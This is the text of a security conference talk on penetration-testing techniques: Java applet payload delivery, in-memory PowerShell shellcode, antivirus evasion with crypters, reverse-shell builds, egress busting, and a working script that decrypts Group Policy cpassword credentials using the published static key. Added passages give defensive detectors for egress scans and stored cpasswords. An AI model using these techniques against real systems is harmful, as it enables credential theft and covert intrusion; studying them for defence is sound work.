
BSIDES Las Vegas
Secret Pentesting Techniques Shhh...
Dave Kennedy, Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
@TrustedSec

Introduction
As penetration testers, exploit writers, huggers, etc., we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.

The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known. Why show you? I'm an open book on everything I do, and sharing is what it's all about.

Technique #1
Java Applet Attack (SET). A well-known attack method, right? Do you know how it actually works? Do you know the techniques behind it that make it successful?

ZOMG APT
News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How did people find out it was SET?

ILIKEHUGS

DEMO: Walking through the Attack

Explaining the Applet


Parameters injected into the HTML code are pulled in by the applet. They are obfuscated and randomized each time, and they tell the applet which attack method to use.

Method 1 Binary Dropper


The binary is downloaded from the attacker machine via a web server (Java downloader). The binary is obfuscated each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).

DEMO: Binary Dropping Technique

Method 1 Weak Sauce


Binaries are easily picked up by AV if signatures focus on the obfuscation techniques (SET changes them each version). Direct interaction with the Windows file system and writing to disk. Multiple points of evidence on the victim machine.

Method 2 Shellcodeexec
The Shellcodeexec method drops a custom-compiled and modified version of shellcodeexec by Bernardo Damele. The executable takes the alphanumeric shellcode as its command-line argument (int main(int argc, char *argv[])). It uses VirtualAlloc to obtain read, write, and execute memory; the alphanumeric shellcode is executed in memory and the payload is delivered.

DEMO: ShellcodeExec

Method 2 Easily detectable


Shellcodeexec is a simple yet awesome method, but it still has a number of drawbacks. Like Method 1, the binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk. Like Method 1, multiple points of evidence on the victim machine.

Method 3 Powershell Injection


Detect if PowerShell is installed (installed by default on Vista and Windows 7 and 8). PowerShell gives us complete flexibility in a number of post-exploitation situations. Technique discovered by Matthew Graeber (you rock).

Method 3 PS ShellCode Injection


The applet detects if PowerShell is installed on the system, grabs the operating system type (x86 / x64), and deploys the shellcode straight through PowerShell.

DEMO: ShellcodeExec

Method 3 Powershell Injection


Never touches disk, so AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely difficult. Extremely reliable and stable.

PE Security Evasion

Scenario 1 Dropping PEs like it's hot


You're using Metasploit, and all of its binaries are being picked up by AV, HIPS, etc. In most cases I will rewrite the exe template for Metasploit to customize the binary for evasion. A couple of cool ways to do this.

Modifying PE For Evasion in MSF


The easiest way for me is to make a simple program that creates an RWX process, then have the program execute the Metasploit shellcode. You can also modify the Metasploit exe.rb template and obfuscate the code that way.

PE Crypters
One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net). It encrypts the PE file using a randomized simple cipher key with AES-128. When the executable is run, it brute-forces the AES key, then decrypts the PE file for you.

DEMO: Hyperion

Hyperion Encryption
Very cool concept, easy to use, and easy to write one for yourself. Ability to have a completely unique PE file each time. Slight downfall: the stub used for the brute force is not polymorphic.

Building a Simple Reverse Shell

The Reverse Shell


Connects out to the attacker (reverse shell).

Compiling Binaries
PyInstaller compiles your Python code into a binary by wrapping the Python interpreter into the executable. Works on Linux, OSX, and Windows.
python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist

Making it easy pybuild.py


All code and samples will be released on the TrustedSec website soon.

DEMO: Building a Shell

Bypassing AV

Finding your way home

Bumping the Firewall


A number of companies restrict outbound ports and only allow what's needed for the business. Trouble getting payloads out, especially if you only have one shot.

Egress Busting
A few ways to do it: a pre-staged payload for identifying a way out, or attempting a staged reverse connection on every port. Metasploit has an ALLPORTS payload as well.

Egress Buster 0.2


Server/client situation where the victim connects out on every port, 1024 ports at a time. The server listens for connections and reports back. Here's where you can have some fun.

Egress Buster Reverse Shell


Released this week! Allows you to bust all ports inside the firewall and spawn a command shell. Custom, so no AV picks this up. Byte-compiled into an executable.

DEMO: Egress Buster Reverse Shell

Egress Buster Reverse Shell Usage


Recent penetration test: found file upload + execute binaries. Could not find a standard port out, i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.
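On the defending side, the pattern above (one host trying hundreds of destination ports in a few seconds, with a handful getting through) stands out in egress firewall logs. The following is an added example, not code from the talk or from Egress Buster: it parses constructed log lines in a made-up "src= dst= dport= action=" format, flags any source that touches at least 100 distinct ports inside one 60-second bucket, and lists which ports the firewall let out.

```python
import re
from collections import defaultdict
from datetime import datetime

# Made-up log format for this example: "<ISO time> src=<ip> dst=<ip> dport=<n> action=ACCEPT|DROP"
LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=\S+ dport=(\d+) action=(ACCEPT|DROP)$")
EPOCH = datetime(1970, 1, 1)

def _constructed_lines():
    """Constructed sample: one host sweeps ports 1024-1200 in five seconds, one host is normal."""
    lines = []
    for i, port in enumerate(range(1024, 1201)):
        action = "ACCEPT" if port in (1080, 1194) else "DROP"   # two obscure ports are open
        lines.append(f"2012-07-25T14:03:{i // 40:02d} src=10.1.5.23 dst=203.0.113.10 "
                     f"dport={port} action={action}")
    for port in (443, 80, 53):
        lines.append(f"2012-07-25T14:03:02 src=10.1.5.40 dst=198.51.100.7 dport={port} action=ACCEPT")
    return lines

SAMPLE_LOG = _constructed_lines()

def detect_egress_bust(lines, window_s=60, min_ports=100):
    """Return {src: {"ports": distinct dports in its busiest window, "allowed": [ports let out]}}
    for every source that touched at least min_ports distinct ports inside one window_s bucket."""
    ports_in_window = defaultdict(set)   # (src, bucket) -> distinct destination ports
    allowed = defaultdict(set)           # src -> ports the firewall accepted
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                     # lines in another format are ignored
        ts, src, dport, action = m.groups()
        secs = int((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S") - EPOCH).total_seconds())
        ports_in_window[(src, secs // window_s)].add(int(dport))
        if action == "ACCEPT":
            allowed[src].add(int(dport))
    alerts = {}
    for (src, _bucket), ports in ports_in_window.items():
        if len(ports) >= min_ports and len(ports) > alerts.get(src, {}).get("ports", 0):
            alerts[src] = {"ports": len(ports), "allowed": sorted(allowed[src])}
    return alerts

if __name__ == "__main__":
    for src, info in detect_egress_bust(SAMPLE_LOG).items():
        print(f"{src}: {info['ports']} distinct ports in one window; allowed out: {info['allowed']}")
```

The "allowed" list is the actionable part for a firewall owner: those are the outbound ports that the rule set lets through and that nobody knew were open.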

Fun with Group Policy

One of my PERSONAL Favorites


How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest. Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

The Attack
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and the Policies folder. Look for a GUID, then MACHINE\Preferences\Group. Look for the Groups.xml file.

Contents of File

Static Key for AES, Anyone?

Python Code
# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
# (the original ran on Python 2 / PyCrypto; shown here for Python 3 with pycryptodome,
#  where PyCrypto's AES.new(key, 2) becomes an explicit AES.MODE_CBC with the all-zero IV
#  that PyCrypto used by default and that the GPP format relies on)
from Crypto.Cipher import AES
from base64 import b64decode

# static AES key published by Microsoft for GPP cpassword values (32 bytes)
key = bytes.fromhex("""
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ", "").replace("\n", ""))

# cpassword attribute value as it appears in Groups.xml
cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")
o = AES.new(key, AES.MODE_CBC, iv=bytes(16)).decrypt(cpassword)
# strip the PKCS#7 padding (last byte gives the pad length), then decode the UTF-16 string
print(o[:-o[-1]].decode('utf-16-le'))

Decrypted Password

>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!

Expanding on Groups.xml

More Passwords Stored


The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, scheduled tasks, SQL servers, and much more are impacted.

List of Other Affected Areas (from rewt dance)


Services\Services.xml
  http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
ScheduledTasks\ScheduledTasks.xml
  http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
  http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
  http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
Printers\Printers.xml
  http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
Drives\Drives.xml
  http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
DataSources\DataSources.xml
  http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)

There's a ton more of these. Hopefully I can make these a series.
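Since every file in the list above stores the secret in the same cpassword attribute, a domain admin can audit SYSVOL for all of them at once. The following is an added example (not the talk's code and not any of the tools it names): it walks a SYSVOL tree, or an offline copy, and reports each non-empty cpassword with the account it belongs to. The Groups.xml fragment is constructed for the example and reuses only the cpassword value shown earlier; the account attribute names (userName, accountName, runAs, username) are those used by the respective XML schemas linked above.

```python
import os
import xml.etree.ElementTree as ET

# GPP files the talk lists as carrying cpassword (under <GPO GUID>\Machine or User\Preferences\...)
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml")
# Attribute holding the account name next to cpassword; it differs per file type
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def find_cpasswords(xml_text):
    """Return (item tag, account, cpassword) for each non-empty cpassword attribute."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    hits = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:                       # absent or empty: no stored password
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        item = parent_of.get(elem, elem)  # <Properties> sits under <User>, <Task>, <NTService>...
        hits.append((item.tag, account, cpw))
    return hits

def scan_sysvol(sysvol_root):
    """Walk a SYSVOL tree (or an offline copy) and collect every cpassword in the affected files."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:   # -sig strips the BOM these files carry
                    for tag, account, cpw in find_cpasswords(fh.read()):
                        findings.append((path, tag, account, cpw))
            except (ET.ParseError, OSError) as err:
                findings.append((path, "UNREADABLE", str(err), ""))
    return findings

# Constructed Groups.xml fragment: the shape of the real file, with the cpassword from the slides
SAMPLE_GROUPS = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" changeLogon="0" noChange="1"
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS):
        print("%s account=%s cpassword=%s" % hit)
```

Any hit is a finding regardless of how strong the password is, because the key that decrypts it is the static one shown on the previous slide.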

Downloads

For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on Downloads.

